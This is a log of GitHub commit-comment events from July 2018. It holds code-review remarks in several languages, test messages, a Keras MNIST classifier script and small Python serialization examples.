{"id":"7974255494","type":"CommitCommentEvent","actor":{"login":"mynguyenbmc"},"repo":{"name":"mynguyenbmc/ghc"},"payload":{"comment":{"id":29729475,"position":73,"line":996,"path":"compiler/typecheck/TcHsType.hs","commit_id":"07ae52e2da839255106f0c3157ad0765658f48ed","created_at":"2018-07-17T04:18:02Z","updated_at":"2018-07-17T04:18:02Z","author_association":"OWNER","body":"here"}},"created_at":"2018-07-17T04:18:02Z"}
{"id":"7974257535","type":"CommitCommentEvent","actor":{"login":"trungams"},"repo":{"name":"idoneam/Canary"},"payload":{"comment":{"id":29729477,"position":null,"line":null,"path":null,"commit_id":"4a2b310241f1132ddcb90b657b30b3d7cda8b2c8","created_at":"2018-07-17T04:18:57Z","updated_at":"2018-07-17T04:18:57Z","author_association":"NONE","body":"Should we reserve a delimiter for welcome messages, so that we can split them into a list and send a random one? And also a placeholder for username of the person who has just joined."}},"created_at":"2018-07-17T04:18:57Z"}
{"id":"7974258684","type":"CommitCommentEvent","actor":{"login":"924485665"},"repo":{"name":"924485665/mnist-CNN"},"payload":{"comment":{"id":29729479,"position":null,"line":null,"path":null,"commit_id":"1f2254f259d84f3a9e410a30f6f1e9bf6b6bbd5a","created_at":"2018-07-17T04:19:27Z","updated_at":"2018-07-17T04:19:27Z","author_association":"OWNER","body":"#coding:utf-8\r\n#classifier\r\nimport numpy as np\r\nnp.random.seed(1337) #for reproducibility\r\nfrom keras import regularizers,callbacks\r\nfrom keras.datasets import mnist\r\nfrom keras.utils import np_utils\r\nfrom keras.models import Sequential,Model,load_model\r\nfrom keras.layers import Input,Dense,Activation,Convolution2D,Flatten,MaxPooling2D,BatchNormalization,Dropout\r\nfrom keras.optimizers import RMSprop,Adam\r\n\r\n#download the mnist to the path'/.keras/datasets/'\r\n#X shape(60,000 28*28),y shape(10,000,)\r\n(X_train,y_train),(X_test,y_test) = mnist.load_data()\r\n\r\n# #data pre-processing\r\n# print('type = ',type(X_train))\r\n# print('shape = ',X_train.shape,X_train.shape[0],X_train.shape[1])\r\n# X_train = X_train.reshape(X_train.shape[0],-1)/255   #normalization\r\n# X_test = X_test.reshape(X_test.shape[0],-1)/255\r\n# y_train = np_utils.to_categorical(y_train,num_classes = 10)\r\n# y_test = np_utils.to_categorical(y_test,num_classes = 10)\r\n\r\n\r\n\r\n\r\n\r\n# model = Sequential()\r\n# model.add(Dense(32,input_dim = 28*28,activation = 'relu'))\r\n# model.add(Dense(10,activation = 'softmax'))\r\n#\r\n#\r\n# #another way to bulid your neural net\r\n# model = Sequential([\r\n#     Dense(32,input_dim = 784),\r\n#     Activation('relu'),\r\n#     Dense(10),\r\n#     Activation('softmax')\r\n# ])\r\n\r\n\r\n# #涓嶇敤搴忚疮妯″瀷鏉ユ瀯閫燜C灞�\r\n# my_inputs = Input(shape = (28*28,))\r\n# x = Dense(32,activation = 'relu')(my_inputs)\r\n# x = Dense(32,activation = 'relu')(x)\r\n# my_results = Dense(10,activation = 'softmax')(x)\r\n# model = Model(inputs = my_inputs,outputs = my_results)\r\n#\r\n# #another way to define your optimizer\r\n# rmsprop = RMSprop(lr = 0.001,rho = 0.9,epsilon = 1e-08,decay = 0.0)\r\n#\r\n# #we add metrics to get more results you want to see\r\n# model.compile(\r\n#     optimizer = rmsprop,\r\n#     loss = 'categorical_crossentropy',\r\n#     metrics = ['accuracy']\r\n# )\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# #鍙互浣跨敤 model.get_config()鏉ユ煡鐪嬫瀯閫犲ソ鐨勬ā鍨嬪弬鏁�,浣跨敤model.summary()鏉ユ煡鐪嬫€讳綋妯″瀷缁撴瀯\r\n# config = model.get_config()\r\n# for x in config:\r\n#     print(x)\r\n# print('model.summary:------')\r\n# model.summary()\r\n#\r\n#\r\n#\r\n# #another way to train the model\r\n# model.fit(X_train,y_train,nb_epoch = 2,batch_size = 32)\r\n#\r\n# # #淇濆瓨妯″瀷(鍙互浣跨敤'..\\'琛ㄧず涓婁竴绾х洰褰�)\r\n# # model.save('..\\my_FCmodel.h5')\r\n#\r\n#\r\n# print('\\ntesting ------------------')\r\n# #evaluate the model with the metrics we define earlier\r\n# loss,accuracy = model.evaluate(X_test,y_test)\r\n# print('parameters-----------------------------------------------')\r\n# for i,x in enumerate(model.layers):\r\n#     try:\r\n#         print('type of cur_layer:',i,type(x.get_weights()))\r\n#         print('shape of cur_layer:',i,np.array(x.get_weights()[0]).shape,np.array(x.get_weights()[1]).shape)\r\n#         print(x.input_shape,x.output_shape)\r\n#     except:\r\n#         pass\r\n#     print(x.get_weights(),'\\n')\r\n#\r\n# print('test loss = ',loss)\r\n# print('test accuracy = ',accuracy)\r\n# import os\r\n# cwd = os.getcwd()\r\n# print(cwd)\r\n# print(os.path.abspath(os.path.dirname(cwd)+'\\.'))\r\n#\r\n# #鍔犺浇淇濆瓨濂界殑妯″瀷\r\n# my_model = load_model('..\\my_FCmodel.h5')\r\n# loss,accuracy = my_model.evaluate(X_test,y_test)\r\n# print(loss,accuracy)\r\n\r\n\r\n\r\n\r\n# #using CNN           test loss:  0.407238004947     test accuracy:  0.9768\r\n\r\n\r\nX_train = X_train.reshape(-1,1,28,28)/255   #normalization\r\nX_test = X_test.reshape(-1,1,28,28)/255\r\ny_train = np_utils.to_categorical(y_train,num_classes = 10)\r\ny_test = np_utils.to_categorical(y_test,num_classes = 10)\r\n\r\nmy_inputs = Input(shape = (1,28,28))\r\nx = Convolution2D(\r\n    batch_input_shape = (None,1,28,28),\r\n    filters = 32,\r\n    kernel_size = 5,\r\n    strides = 1,\r\n    padding = 'same',\r\n    data_format = 'channels_first',\r\n)(my_inputs)\r\nx = BatchNormalization()(x)\r\nx = Activation('relu')(x)\r\n\r\nx = MaxPooling2D(\r\n    pool_size = 2,\r\n    strides = 2,\r\n    padding = 'same',\r\n    data_format = 'channels_first',\r\n)(x)\r\n\r\n\r\nx = Convolution2D(\r\n    filters = 64,\r\n    kernel_size = 5,\r\n    strides = 1,\r\n    padding = 'same',\r\n    data_format = 'channels_first',\r\n)(x)\r\n\r\nx = BatchNormalization()(x)\r\nx = Activation('relu')(x)\r\n\r\n\r\nx = MaxPooling2D(\r\n    pool_size = 2,\r\n    strides = 2,\r\n    padding = 'same',\r\n    data_format = 'channels_first',\r\n)(x)\r\n\r\nx = Flatten()(x)\r\nx = Dense(1024,activation = 'relu',kernel_regularizer = regularizers.l2(0.0001),activity_regularizer=regularizers.l1(0.0001))(x)\r\nx = Dropout(0.4)(x)\r\nmy_outputs = Dense(10,activation = 'softmax')(x)\r\n\r\nmodel = Model(inputs = my_inputs,outputs = my_outputs)\r\n\r\n\r\n\r\n# Another way to define your optimizer\r\nadam = Adam(lr=1e-4)\r\n\r\n# We add metrics to get more results you want to see\r\nmodel.compile(optimizer=adam,\r\n              loss='categorical_crossentropy',\r\n              metrics=['accuracy'])\r\n\r\n#鍙互浣跨敤 model.get_config()鏉ユ煡鐪嬫瀯閫犲ソ鐨勬ā鍨嬪弬鏁�,浣跨敤model.summary()鏉ユ煡鐪嬫€讳綋妯″瀷缁撴瀯\r\nconfig = model.get_config()\r\nprint(type(config),config)\r\nfor x in config:\r\n    print(x)\r\nprint('model.summary:------')\r\nmodel.summary()\r\n\r\n\r\nprint('Training ------------')\r\n# Another way to train the model\r\nmodel.fit(X_train, y_train, epochs=10, batch_size=64,callbacks = [callbacks.EarlyStopping(min_delta = 0.001,patience = 2,monitor = 'acc',mode = 'max')])\r\n\r\nprint('\\nTesting ------------')\r\n# Evaluate the model with the metrics we defined earlier\r\nloss, accuracy = model.evaluate(X_test, y_test)\r\n\r\nprint('\\ntest loss: ', loss)\r\nprint('\\ntest accuracy: ', accuracy)\r\n"}},"created_at":"2018-07-17T04:19:27Z"}
{"id":"7974260272","type":"CommitCommentEvent","actor":{"login":"HackFisher"},"repo":{"name":"artwook/contracts"},"payload":{"comment":{"id":29729484,"position":40,"line":228,"path":"contracts/Crowdsale.sol","commit_id":"4731360c583a026b6cd850d70c1b8d3a9b9763c6","created_at":"2018-07-17T04:20:05Z","updated_at":"2018-07-17T04:20:05Z","author_association":"COLLABORATOR","body":"感觉这边只判断了1，2，3，4个step，所以step那边用数组没有特别大意义，因为这边也没有用到循环。"}},"created_at":"2018-07-17T04:20:05Z"}
{"id":"7974268451","type":"CommitCommentEvent","actor":{"login":"shmkane"},"repo":{"name":"shmkane/SellStick"},"payload":{"comment":{"id":29729500,"position":null,"line":null,"path":null,"commit_id":"fc5999399c6bc757ec8a99ced7b8ca7c406475e0","created_at":"2018-07-17T04:23:38Z","updated_at":"2018-07-17T04:23:38Z","author_association":"OWNER","body":"Changes involving better handling of different factions plugins and better support fort ASkyBlock."}},"created_at":"2018-07-17T04:23:38Z"}
{"id":"7974268806","type":"CommitCommentEvent","actor":{"login":"CPPAlien"},"repo":{"name":"Kujiale-Mobile/Painter"},"payload":{"comment":{"id":29729502,"position":30,"line":236,"path":"components/painter/lib/pen.js","commit_id":"5f8701d814dd780c6a45d1ae1d575a778e34c9f5","created_at":"2018-07-17T04:23:48Z","updated_at":"2018-07-17T04:23:48Z","author_association":"CONTRIBUTOR","body":"stroke 颜色根据字体颜色来"}},"created_at":"2018-07-17T04:23:48Z"}
{"id":"7974269803","type":"CommitCommentEvent","actor":{"login":"CPPAlien"},"repo":{"name":"Kujiale-Mobile/Painter"},"payload":{"comment":{"id":29729505,"position":9,"line":215,"path":"components/painter/lib/pen.js","commit_id":"5f8701d814dd780c6a45d1ae1d575a778e34c9f5","created_at":"2018-07-17T04:24:14Z","updated_at":"2018-07-17T04:24:14Z","author_association":"CONTRIBUTOR","body":"后尾的符号都不要去掉"}},"created_at":"2018-07-17T04:24:14Z"}
{"id":"7974270004","type":"CommitCommentEvent","actor":{"login":"BehindTheMath"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":29729506,"position":null,"line":null,"path":null,"commit_id":"d488c0b1f51ae52a48e5eb3fd3bed9fa13dc9fea","created_at":"2018-07-17T04:24:19Z","updated_at":"2018-07-17T04:24:19Z","author_association":"CONTRIBUTOR","body":"Submitted #27352."}},"created_at":"2018-07-17T04:24:19Z"}
{"id":"7974288182","type":"CommitCommentEvent","actor":{"login":"aizaiz"},"repo":{"name":"luxtagofficial/Apostille-library"},"payload":{"comment":{"id":29729548,"position":5,"line":107,"path":"src/PublicApostille.ts","commit_id":"0ad9713b9cfb7c1d463b40d5a06d64966c070e70","created_at":"2018-07-17T04:32:01Z","updated_at":"2018-07-17T04:32:01Z","author_association":"CONTRIBUTOR","body":"@gimyboya I think this condition is not necessary anymore, because it came from the same source"}},"created_at":"2018-07-17T04:32:01Z"}
{"id":"7974292407","type":"CommitCommentEvent","actor":{"login":"pathawks"},"repo":{"name":"jekyll/jekyll"},"payload":{"comment":{"id":29729559,"position":20,"line":36,"path":"docs/_docs/upgrading/3-to-4.md","commit_id":"f034f624cc1cbe73a4d327f47cdb327c8f82c02a","created_at":"2018-07-17T04:33:51Z","updated_at":"2018-07-17T04:33:51Z","author_association":"MEMBER","body":":+1:"}},"created_at":"2018-07-17T04:33:51Z"}
{"id":"7974294381","type":"CommitCommentEvent","actor":{"login":"LopaWang"},"repo":{"name":"LopaWang/intercomWXTG-dev"},"payload":{"comment":{"id":29729564,"position":null,"line":null,"path":null,"commit_id":"405b2c953474867173b44880685f8b295d8fdf3f","created_at":"2018-07-17T04:34:42Z","updated_at":"2018-07-17T04:34:42Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-17T04:34:42Z"}
{"id":"7974295656","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29729566,"position":null,"line":null,"path":null,"commit_id":"fa41b7e29efc4e4f34413fe02dbd8a46db318502","created_at":"2018-07-17T04:35:18Z","updated_at":"2018-07-17T04:35:18Z","author_association":"NONE","body":"7/12(木)課題について\r\nほぼ大丈夫ですが、1行目が結果とずれてますね。\r\n\r\nあと、授業で使ったコードを移動しているみたいですが、git mvで移動するとコミット1回で済みます。参考まで。"}},"created_at":"2018-07-17T04:35:18Z"}
{"id":"7974299987","type":"CommitCommentEvent","actor":{"login":"ShivaPrasad88677"},"repo":{"name":"ShivaPrasad88677/Samples"},"payload":{"comment":{"id":29729579,"position":null,"line":null,"path":null,"commit_id":"efcbef21c0e6bf21ba1791c820abd2373f96586a","created_at":"2018-07-17T04:37:14Z","updated_at":"2018-07-17T04:37:14Z","author_association":"OWNER","body":"All those programs which contains the basics of java"}},"created_at":"2018-07-17T04:37:14Z"}
{"id":"7974305375","type":"CommitCommentEvent","actor":{"login":"Yogesh1910"},"repo":{"name":"Yogesh1910/helloworld"},"payload":{"comment":{"id":29729595,"position":null,"line":null,"path":null,"commit_id":"e96dfcb39af80f5f09eda7cfcbbaf82b31e46602","created_at":"2018-07-17T04:39:37Z","updated_at":"2018-07-17T04:39:37Z","author_association":"OWNER","body":"testing"}},"created_at":"2018-07-17T04:39:37Z"}
{"id":"7974305502","type":"CommitCommentEvent","actor":{"login":"Ellerden"},"repo":{"name":"Ellerden/lesson1"},"payload":{"comment":{"id":29729596,"position":22,"line":22,"path":"right_triangle.rb","commit_id":"c35433f32a3865efb80dd9c5c2b677817acfc258","created_at":"2018-07-17T04:39:40Z","updated_at":"2018-07-17T04:39:40Z","author_association":"OWNER","body":"Привет! Спасибо, это я упустила из условия. Поправлю"}},"created_at":"2018-07-17T04:39:40Z"}
{"id":"7974307344","type":"CommitCommentEvent","actor":{"login":"danielosoki"},"repo":{"name":"danielosoki/logos"},"payload":{"comment":{"id":29729601,"position":2,"line":2,"path":"README.md","commit_id":"046c43a838232f10308956ac66c2438c60bc9e18","created_at":"2018-07-17T04:40:30Z","updated_at":"2018-07-17T04:40:30Z","author_association":"OWNER","body":"\r\ny"}},"created_at":"2018-07-17T04:40:30Z"}
{"id":"7974307432","type":"CommitCommentEvent","actor":{"login":"danielosoki"},"repo":{"name":"danielosoki/logos"},"payload":{"comment":{"id":29729602,"position":1,"line":1,"path":"README.md","commit_id":"046c43a838232f10308956ac66c2438c60bc9e18","created_at":"2018-07-17T04:40:32Z","updated_at":"2018-07-17T04:40:32Z","author_association":"OWNER","body":"t"}},"created_at":"2018-07-17T04:40:32Z"}
{"id":"7974307551","type":"CommitCommentEvent","actor":{"login":"danielosoki"},"repo":{"name":"danielosoki/logos"},"payload":{"comment":{"id":29729605,"position":null,"line":null,"path":null,"commit_id":"046c43a838232f10308956ac66c2438c60bc9e18","created_at":"2018-07-17T04:40:36Z","updated_at":"2018-07-17T04:40:36Z","author_association":"OWNER","body":"t"}},"created_at":"2018-07-17T04:40:36Z"}
{"id":"7974307635","type":"CommitCommentEvent","actor":{"login":"danielosoki"},"repo":{"name":"danielosoki/logos"},"payload":{"comment":{"id":29729606,"position":null,"line":null,"path":null,"commit_id":"046c43a838232f10308956ac66c2438c60bc9e18","created_at":"2018-07-17T04:40:38Z","updated_at":"2018-07-17T04:40:38Z","author_association":"OWNER","body":"t"}},"created_at":"2018-07-17T04:40:38Z"}
{"id":"7974307673","type":"CommitCommentEvent","actor":{"login":"danielosoki"},"repo":{"name":"danielosoki/logos"},"payload":{"comment":{"id":29729607,"position":null,"line":null,"path":null,"commit_id":"046c43a838232f10308956ac66c2438c60bc9e18","created_at":"2018-07-17T04:40:39Z","updated_at":"2018-07-17T04:40:39Z","author_association":"OWNER","body":"t"}},"created_at":"2018-07-17T04:40:39Z"}
{"id":"7974307730","type":"CommitCommentEvent","actor":{"login":"danielosoki"},"repo":{"name":"danielosoki/logos"},"payload":{"comment":{"id":29729608,"position":null,"line":null,"path":null,"commit_id":"046c43a838232f10308956ac66c2438c60bc9e18","created_at":"2018-07-17T04:40:40Z","updated_at":"2018-07-17T04:40:40Z","author_association":"OWNER","body":"t"}},"created_at":"2018-07-17T04:40:40Z"}
{"id":"7974307799","type":"CommitCommentEvent","actor":{"login":"danielosoki"},"repo":{"name":"danielosoki/logos"},"payload":{"comment":{"id":29729610,"position":null,"line":null,"path":null,"commit_id":"046c43a838232f10308956ac66c2438c60bc9e18","created_at":"2018-07-17T04:40:42Z","updated_at":"2018-07-17T04:40:42Z","author_association":"OWNER","body":"4e5t"}},"created_at":"2018-07-17T04:40:42Z"}
{"id":"7974309462","type":"CommitCommentEvent","actor":{"login":"Phowkin"},"repo":{"name":"Phowkin/Test"},"payload":{"comment":{"id":29729616,"position":225,"line":225,"path":"effluxConnection.cs","commit_id":"af82e39f02c2c263c07998e402936c46b4a5939a","created_at":"2018-07-17T04:41:27Z","updated_at":"2018-07-17T04:41:27Z","author_association":"OWNER","body":"TEst"}},"created_at":"2018-07-17T04:41:27Z"}
{"id":"7974310287","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18013/programming-term2"},"payload":{"comment":{"id":29729621,"position":null,"line":null,"path":null,"commit_id":"0e42d186c6c9d557f0f1176bdb1563d15a673ed4","created_at":"2018-07-17T04:41:50Z","updated_at":"2018-07-17T04:41:50Z","author_association":"NONE","body":"九九自体は出来ていて整形されていますので、最低限の部分はOKです。\r\nただ、サンプルで提示した1,2行目、あと左の「段」の表示が出来ていません。"}},"created_at":"2018-07-17T04:41:50Z"}
{"id":"7974312381","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29729632,"position":21,"line":54,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-17T04:42:43Z","updated_at":"2018-07-17T04:42:43Z","author_association":"CONTRIBUTOR","body":"1. 감사합니당.\r\n2. 아. destroy.... routes.rb에 같은 namespace의 user resource가 remove로 되어 있어서 따라했네요. 앞으로 crud-verbs에 주의하겠습니다."}},"created_at":"2018-07-17T04:42:43Z"}
{"id":"7974313564","type":"CommitCommentEvent","actor":{"login":"shiju-john"},"repo":{"name":"shiju-john/FlyQAModel"},"payload":{"comment":{"id":29729637,"position":null,"line":null,"path":null,"commit_id":"62675312d9e250335b99e4029a8143a73cf39485","created_at":"2018-07-17T04:43:13Z","updated_at":"2018-07-17T04:43:13Z","author_association":"OWNER","body":"commit merge"}},"created_at":"2018-07-17T04:43:13Z"}
{"id":"7974316307","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29729643,"position":35,"line":653,"path":"src/Psalm/Type.php","commit_id":"1e54c61fde8c4db15ddb4ec96ae6cd1c48270eb9","created_at":"2018-07-17T04:44:31Z","updated_at":"2018-07-17T04:44:31Z","author_association":"CONTRIBUTOR","body":"Is the duplicate line intentional?\r\n\r\nAlso, is this supposed to work in other types? (E.g. `array{0:CoolType,1:false}`)"}},"created_at":"2018-07-17T04:44:31Z"}
{"id":"7974317958","type":"CommitCommentEvent","actor":{"login":"parmeshwar12"},"repo":{"name":"vitorfs/bootcamp"},"payload":{"comment":{"id":29729652,"position":null,"line":null,"path":null,"commit_id":"588a3b276215b89e0b9759d06bb3265c0bfd9bea","created_at":"2018-07-17T04:45:13Z","updated_at":"2018-07-17T04:45:13Z","author_association":"NONE","body":"its very good to learning "}},"created_at":"2018-07-17T04:45:13Z"}
{"id":"7974318252","type":"CommitCommentEvent","actor":{"login":"benmccann"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29729655,"position":null,"line":null,"path":null,"commit_id":"ac80d337e3a78d3dabcd73bb9c6f3656ce16f4ae","created_at":"2018-07-17T04:45:19Z","updated_at":"2018-07-17T04:45:19Z","author_association":"COLLABORATOR","body":"Another way to do this will be `as().smileDataset(...).labels()`"}},"created_at":"2018-07-17T04:45:19Z"}
{"id":"7974323060","type":"CommitCommentEvent","actor":{"login":"amogh-jrules"},"repo":{"name":"amogh-jrules/fixutres"},"payload":{"comment":{"id":29729668,"position":null,"line":null,"path":null,"commit_id":"42772d48e276f9ceecb69916fab04b72a2549832","created_at":"2018-07-17T04:47:18Z","updated_at":"2018-07-17T04:47:18Z","author_association":"OWNER","body":"Working commit"}},"created_at":"2018-07-17T04:47:18Z"}
{"id":"7974324395","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29729670,"position":21,"line":54,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-17T04:47:51Z","updated_at":"2018-07-17T04:47:51Z","author_association":"CONTRIBUTOR","body":"1. 네네\r\n2-1. 어디에 remove가 있나요? 그런 변칙은 같이 연구해 보면 합니다.\r\n2-2. 주의하기 보단 이런 겁니다. 원칙을 알고 변칙을 쓰는 것과 처음부터 변칙만 고려하는 것은 다르다는 거죠. 그래서 왜 변칙을 썼냐는 질문을 \"변칙쓰지마\"로 오해하시지 않으시길 바랍니다. 그리고 원칙을 아는 것은 그냥 아는게 아니라 그 원칙이 왜 만들어졌나를 알아야 변칙을 제대로 쓰실 수 있습니다. 저도 완벽하게 아는 것은 아니니까 같이 연구해서 정진하면 합니다.\r\n"}},"created_at":"2018-07-17T04:47:51Z"}
{"id":"7974325699","type":"CommitCommentEvent","actor":{"login":"pixcat2000"},"repo":{"name":"pixcat2000/filesbox"},"payload":{"comment":{"id":29729675,"position":null,"line":null,"path":null,"commit_id":"75aa77ba97d225babd0c74584999d2299c62cefe","created_at":"2018-07-17T04:48:24Z","updated_at":"2018-07-17T04:48:24Z","author_association":"OWNER","body":"文件列表"}},"created_at":"2018-07-17T04:48:24Z"}
{"id":"7974327956","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29729683,"position":35,"line":653,"path":"src/Psalm/Type.php","commit_id":"1e54c61fde8c4db15ddb4ec96ae6cd1c48270eb9","created_at":"2018-07-17T04:49:28Z","updated_at":"2018-07-17T04:49:28Z","author_association":"CONTRIBUTOR","body":"Unrelated: Does this approach work with `CoolType = Closure() : int`, `@return CoolType|false`"}},"created_at":"2018-07-17T04:49:28Z"}
{"id":"7974329556","type":"CommitCommentEvent","actor":{"login":"zqc0512"},"repo":{"name":"anbai-inc/Kibana_Hanization"},"payload":{"comment":{"id":29729688,"position":null,"line":null,"path":null,"commit_id":"488a762891245f8559cc1b105c6d07ce1f2c9be3","created_at":"2018-07-17T04:50:12Z","updated_at":"2018-07-17T04:50:12Z","author_association":"NONE","body":"所有的版本都有这个问题还是莫几个版本？\r\n@anbai-inc "}},"created_at":"2018-07-17T04:50:12Z"}
{"id":"7974330344","type":"CommitCommentEvent","actor":{"login":"rustyrussell"},"repo":{"name":"ElementsProject/lightning"},"payload":{"comment":{"id":29729691,"position":null,"line":null,"path":null,"commit_id":"8416c7ae1eb3c5456a4500f5ee6e17036b9da3c2","created_at":"2018-07-17T04:50:31Z","updated_at":"2018-07-17T04:50:31Z","author_association":"CONTRIBUTOR","body":"Ack 8416c7ae1eb3c5456a4500f5ee6e17036b9da3c2\r\n\r\nGood catch!"}},"created_at":"2018-07-17T04:50:31Z"}
{"id":"7974337342","type":"CommitCommentEvent","actor":{"login":"warnyul"},"repo":{"name":"wupdigital/android-maven-publish"},"payload":{"comment":{"id":29729712,"position":51,"line":51,"path":"sample/build.gradle","commit_id":"091ed3691177b3dbc93920f7cc9a6350cd902775","created_at":"2018-07-17T04:53:31Z","updated_at":"2018-07-17T04:53:31Z","author_association":"CONTRIBUTOR","body":"The android-maven-publish plugin uses the original api, it just adds a component for publish android libraries. Lets check the official documentation: https://docs.gradle.org/current/userguide/publishing_maven.html"}},"created_at":"2018-07-17T04:53:31Z"}
{"id":"7974337792","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29729713,"position":121,"line":222,"path":"src/Psalm/Checker/CommentChecker.php","commit_id":"1e54c61fde8c4db15ddb4ec96ae6cd1c48270eb9","created_at":"2018-07-17T04:53:43Z","updated_at":"2018-07-17T04:53:43Z","author_association":"CONTRIBUTOR","body":"This could check if $type_alias was already declared earler in this file before overwriting it (`if (isset($type_alias_tokens[$type_alias])) { warn...; continue; }`)"}},"created_at":"2018-07-17T04:53:43Z"}
{"id":"7974338483","type":"CommitCommentEvent","actor":{"login":"e-src"},"repo":{"name":"e-src/recipes"},"payload":{"comment":{"id":29729715,"position":12,"line":17,"path":"chili-recipe.txt","commit_id":"0cff8479f2ca8331c9a38bda8c88ce373ff13778","created_at":"2018-07-17T04:54:01Z","updated_at":"2018-07-17T04:54:01Z","author_association":"OWNER","body":"nice merge!"}},"created_at":"2018-07-17T04:54:01Z"}
{"id":"7974342162","type":"CommitCommentEvent","actor":{"login":"Neepawa"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":29729721,"position":null,"line":null,"path":null,"commit_id":"a323b126e5ea89d4f54f6dfffdbb52a126a19449","created_at":"2018-07-17T04:55:30Z","updated_at":"2018-07-17T04:55:30Z","author_association":"NONE","body":"Line 2432 was changed from\r\n\r\n    . /opt/pihole/webpage.sh\r\n\r\nto (note that the leading \".\" is missing):\r\n\r\n    /opt/pihole/webpage.sh\r\n\r\nBecause `webpage.sh` is no longer sourced, the `HashPassword` function is not available. The command on the next line to write the hashed password to the setupVars file fails. "}},"created_at":"2018-07-17T04:55:30Z"}
{"id":"7974345568","type":"CommitCommentEvent","actor":{"login":"daishi4u"},"repo":{"name":"celador/ForceCode"},"payload":{"comment":{"id":29729730,"position":null,"line":null,"path":null,"commit_id":"a7186864eb105972e31d08d1c5d387c8e32e5ffc","created_at":"2018-07-17T04:56:57Z","updated_at":"2018-07-17T04:56:57Z","author_association":"NONE","body":"Changing the sfdx.force.apex. commands to ForceCode will break test method running. Currently, the salesforce extensions call this command when the run test links are clicked in a test class. So if you change this, it will not work the way it should, instead it will throw an error. "}},"created_at":"2018-07-17T04:56:57Z"}
{"id":"7974345633","type":"CommitCommentEvent","actor":{"login":"babujirra"},"repo":{"name":"babujirra/devops--evening"},"payload":{"comment":{"id":29729731,"position":1,"line":1,"path":"README.md","commit_id":"baf60b9e1019fd4e77c9572a806da50483085d3b","created_at":"2018-07-17T04:56:59Z","updated_at":"2018-07-17T04:56:59Z","author_association":"OWNER","body":"hai \r\nhello\r\n"}},"created_at":"2018-07-17T04:56:59Z"}
{"id":"7974346724","type":"CommitCommentEvent","actor":{"login":"Yogesh1910"},"repo":{"name":"Yogesh1910/helloworld"},"payload":{"comment":{"id":29729737,"position":null,"line":null,"path":null,"commit_id":"35afd33e324468169393bdd0a631a9c8988dde8e","created_at":"2018-07-17T04:57:28Z","updated_at":"2018-07-17T04:57:28Z","author_association":"OWNER","body":"dasdfasdfasdf sdfasdf"}},"created_at":"2018-07-17T04:57:28Z"}
{"id":"7974348205","type":"CommitCommentEvent","actor":{"login":"STP-USS"},"repo":{"name":"Sorn01/Sokt01"},"payload":{"comment":{"id":29729742,"position":null,"line":null,"path":null,"commit_id":"39005274d9c5c76f4bf671f3f8dbfa7fb6605b8a","created_at":"2018-07-17T04:58:08Z","updated_at":"2018-07-17T04:58:08Z","author_association":"COLLABORATOR","body":"Or right"}},"created_at":"2018-07-17T04:58:08Z"}
{"id":"7974349305","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29729746,"position":2,"line":2,"path":"9.jason and pickle","commit_id":"41d084fc6702ac3f374eba8239d6d15a6fd30438","created_at":"2018-07-17T04:58:35Z","updated_at":"2018-07-17T04:58:35Z","author_association":"OWNER","body":"```\r\nimport json  #序列化简单语句，但能在所有语言中使用\r\n\r\ninfo={\r\n    'name':'downtiser',\r\n    'age':18,\r\n    'winrate':'56%'\r\n\r\n}\r\nf=open('exam.txt','w')\r\n\r\nf.write(json.dumps(info))  #json只能处理简单的数据类型  该语句等价于json.dump(info,f)\r\n\r\ninfo['winrate']='65%'\r\n#f.write(json.dumps(info))  #序列化时只能dump一次，如果想多dump，要新开几个文件\r\n\r\nf.close()\r\n```"}},"created_at":"2018-07-17T04:58:35Z"}
{"id":"7974350904","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29729749,"position":4,"line":4,"path":"9.jason and pickle","commit_id":"41d084fc6702ac3f374eba8239d6d15a6fd30438","created_at":"2018-07-17T04:59:12Z","updated_at":"2018-07-17T04:59:12Z","author_association":"OWNER","body":"```\r\n#Downtiser\r\nimport json\r\nf=open('exam.txt','r')\r\n\r\n# data=json.loads(f.read())\r\ndata=json.load(f)\r\nprint(data['name'])\r\nf.close()\r\n```"}},"created_at":"2018-07-17T04:59:12Z"}
{"id":"7974351646","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29729753,"position":7,"line":7,"path":"9.jason and pickle","commit_id":"41d084fc6702ac3f374eba8239d6d15a6fd30438","created_at":"2018-07-17T04:59:30Z","updated_at":"2018-07-17T04:59:30Z","author_association":"OWNER","body":"```\r\n#Downtiser\r\nimport pickle  #能序列化所有数据类型,但只能在python内部使用\r\n\r\ndef fun1(name):\r\n    print('downtiser')\r\n\r\ninfo={\r\n    'name':'downtiser',\r\n    'age':18,\r\n    'winrate':'56%',\r\n    'func':fun1\r\n\r\n}\r\nf=open('exam.txt','wb')\r\nprint(pickle.dumps(info))  #pickle.dumps将数据默认转为二进制格式\r\n\r\nf.write(pickle.dumps(info))\r\nf.close()\r\n```"}},"created_at":"2018-07-17T04:59:30Z"}
